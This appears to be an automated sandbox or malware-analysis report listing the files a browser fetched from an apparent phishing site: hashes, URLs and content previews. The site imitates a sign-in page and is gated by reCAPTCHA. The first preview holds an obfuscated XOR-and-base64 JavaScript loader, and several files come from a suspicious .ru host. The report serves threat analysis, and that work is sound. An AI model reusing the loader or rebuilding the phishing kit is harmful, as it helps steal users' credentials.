                                                                  Preview:<script>..function VuZizvkRQn(FqqFzFsGah, agajSsJFdC) {..let gZUYtxEFWC = '';..FqqFzFsGah = atob(FqqFzFsGah);..let WKROLGhfAZ = agajSsJFdC.length;..for (let i = 0; i < FqqFzFsGah.length; i++) {.. gZUYtxEFWC += String.fromCharCode(FqqFzFsGah.charCodeAt(i) ^ agajSsJFdC.charCodeAt(i % WKROLGhfAZ));..}..return gZUYtxEFWC;..}..var xbByBMhlHz = VuZizvkRQn(`BUszCz8bBRA9OFoFchEiHwFDdGUWWz8dM0UbQTsvS0F+GjkGXlo/P1xKKVRlRUcefmRUUT5XPBhTDnJlSlsiECYfTz1EdkpbIhAmH1FDPCkEGjgNIhsCCmFlWlw+EyVFElwhP11ePBgkDl9TIScWWToYLkQdWSw5FlsiACYfHh0kORYMfkh4Wl5TPDNJTD9UPBhfXSckF1IjW2hXXkMtOFBIJEdbYXw6cjlaSjkJIlV8OiAvThgWDDgIBVkhJBFZJBY0Q1ZRGRNecxdMPg8cXCATYWomGj9eQmoZAFJbPRVkMSl5KSxxTzcdZAcEaglzCnQ9Nz4JNkgfK35+JR0RUgV5BjIBcRgdJgkcYjguQA02GhEDGVIgGE9aAztuDTJyOxNhYiAjZC1BUn0DTFwINzoIGnYgEG4NYDU7BwRpfDIIYhcvLCAyeg0uYXInMD8AAXkGOXd7OTgxIjJxKQN6eTcdZAcEaglzCnQ9ASAyQ3Z+K24BJTASWxZ5IwxQWmMvZiQcej0Tbg0iMDwYP3Mgend7PSsgMkJmOhBuDWA1Oy0aagscC2IHTGY/Nlw0Ln5uJSMOIh55Iz5VXQcrIA9DBCcGeno9HQFeG1QJJk9aOTg5MSlqIihXaSAwHhg/cycLXnET
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (10017)
                                                                  Category:downloaded
                                                                  Size (bytes):10245
                                                                  Entropy (8bit):5.437589264532084
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                  SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                  SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                  SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250326%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250326T055845Z&X-Amz-Expires=300&X-Amz-Signature=5d0a92e103b4e318696c0391091e08581eb176779da74cee795c4fcda8648e79&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                  Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):26765
                                                                  Entropy (8bit):5.114987586674101
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:1A862A89D5633FAC83D763886726740D
                                                                  SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                  SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                  SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/34mdHVcd0wRK58920
                                                                  Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (1483), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):1483
                                                                  Entropy (8bit):5.78766748899154
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:0307E2020CE43C1A6ABB2A6A9997B5D7
                                                                  SHA1:F6272006277DDEC83E26CA45DC232EB127123618
                                                                  SHA-256:5260B19A391754B741EC0D7FC4DE3D4B524CF5A847A83B4648F8259A08C3DAF1
                                                                  SHA-512:441CBEBAB0A3F2F88086A2E6EB544823FAF155F8E90AFF55FECC0A21E1C1778A84389529B995C9375D31DE60438DA2324E619E652C329BB424D5829DBFE96BAB
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.google.com/recaptcha/api.js
                                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A7vZI3v+Gz7JfuRolKNM4Aff6zaGuT7X0mf3wtoZTnKv6497cVMnhy03KDqX7kBz/q/iidW7srW31oQbBt4VhgoAAACUeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJEaXNhYmxlVGhpcmRQYXJ0eVN0b3JhZ2VQYXJ0aXRpb25pbmczIiwiZXhwaXJ5IjoxNzU3OTgwODAwLCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlfQ==';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='tre
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):892
                                                                  Entropy (8bit):5.863167355052868
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:41D62CA205D54A78E4298367482B4E2B
                                                                  SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                  SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                  SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/opRDfkOXrsMnYvNNx4dtbnUz3oOQk0WOw2mn2kCcuGj6JmwznBcacfAn45140
                                                                  Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):10796
                                                                  Entropy (8bit):7.946024875001343
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                  SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                  SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                  SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):48316
                                                                  Entropy (8bit):5.6346993394709
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):1298
                                                                  Entropy (8bit):6.665390877423149
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:32CA2081553E969F9FDD4374134521AD
                                                                  SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                  SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                  SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/ijxbIFM35ef0YB7ynrIMZkoZM73so5LWwiopAFQMb2gqvNqDiWbmViQTZH9xYRvr6Uh1Y3ab230
                                                                  Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):36696
                                                                  Entropy (8bit):7.988666025644622
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                  SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                  SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                  SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/GDSherpa-regular.woff
                                                                  Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:dropped
                                                                  Size (bytes):644
                                                                  Entropy (8bit):4.6279651077789685
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:541B83C2195088043337E4353B6FD60D
                                                                  SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                  SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                  SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):15552
                                                                  Entropy (8bit):7.983966851275127
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                  SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                  SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                  SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                  Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (51734)
                                                                  Category:downloaded
                                                                  Size (bytes):222931
                                                                  Entropy (8bit):5.0213311632628725
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                  SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                  SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                  SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                  Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):43596
                                                                  Entropy (8bit):7.9952701440723475
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                  SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                  SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                  SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/GDSherpa-vf.woff2
                                                                  Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65447)
                                                                  Category:downloaded
                                                                  Size (bytes):89501
                                                                  Entropy (8bit):5.289893677458563
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):2537
                                                                  Entropy (8bit):5.043951607650212
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:CB4C0CD866C02EDDA27FC621D57F4FFC
                                                                  SHA1:C560352F7B6497F58236E7AB9F4669157889E886
                                                                  SHA-256:C274DAC0BFD1186C565004BF39A58991E6C3552A0552ED4790E5F09C12BC1221
                                                                  SHA-512:71C3BF7A2F72D44CD612DB50F48FB4821765AD0486CC91E0A3373D1FEC69D7546E45386CC15814BC578AC1EE6C01F7C4104B084381413A8045C89E37A8DE38AF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://essaystoolkit.com/sector/
                                                                  Preview:<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>reCAPTCHA</title>.. <script src='https://www.google.com/recaptcha/api.js' async defer></script>....</head>..<style>.. .loader {.. border: 6px solid #f3f3f3; /* Light grey */.. border-top: 6px solid #3498db; /* Blue */.. border-radius: 50%;.. width: 30px;.. height: 30px;.. animation: spin 1s linear infinite;.. display: none;..}....@keyframes spin {.. 0% { transform: rotate(0deg); }.. 100% { transform: rotate(360deg); }..}..</style>..<body>.. <div>.. <div style="display: flex; justify-content: center; align-items: center; margin-top: 30px;" id="captcha">.. <div>.. <div class="g-recaptcha" data-sitekey="6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil"></div>.. <div id="g-recaptcha-error" style="height: 20px; font-size: 12px; margin-top: 5px;" ></div>.. <div style="text-align: center;">
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 450x450, components 3
                                                                  Category:dropped
                                                                  Size (bytes):38998
                                                                  Entropy (8bit):7.970524222433256
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:604F3FB04B8B507969AB1DE550DA83A0
                                                                  SHA1:F3C90B6763F07A74A69C53A790C93FC0D17AC50C
                                                                  SHA-256:FADEE03ABA13B21C24214BA04785376CC8BBA7A3F5220E8E33B894351600C056
